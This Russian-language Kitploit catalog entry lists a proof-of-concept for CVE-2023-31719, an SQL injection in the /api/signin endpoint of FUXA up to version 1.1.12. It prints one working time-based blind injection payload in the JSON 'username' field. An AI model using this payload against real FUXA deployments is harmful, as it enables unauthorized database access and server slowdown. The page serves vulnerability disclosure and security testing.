Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-31719 — Эксплойт proof-of-concept для CVE-2023-31719, демонстрирующий SQL-инъекцию в конечной точке /api/signin веб-приложения FUXA через изменённый параметр имени пользователя в формате JSON. | Kitploit
Инструменты/GitHubGitHub/mateustesser/cve-2023-31719
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование безопасности APIТестирование на ПроникновениеБезопасность Баз Данных
GitHubmateustesser/cve-2023-31719

CVE-2023-31719

Эксплойт proof-of-concept для CVE-2023-31719, демонстрирующий SQL-инъекцию в конечной точке /api/signin веб-приложения FUXA через изменённый параметр имени пользователя в формате JSON.

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-31719

Возможно внедрение SQL-кода в JSON-параметр "username" из точки входа /api/signin через HTTP POST-запрос

root@kitploit:~
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}

Название затронутого продукта: FUXA

Затронутая версия: <= 1.1.12

Проблема: SQL Injection

Описание: Возможно внедрение SQL-кода в JSON-параметр "username" из точки входа /api/signin через HTTP POST-запрос

Скачать инструмент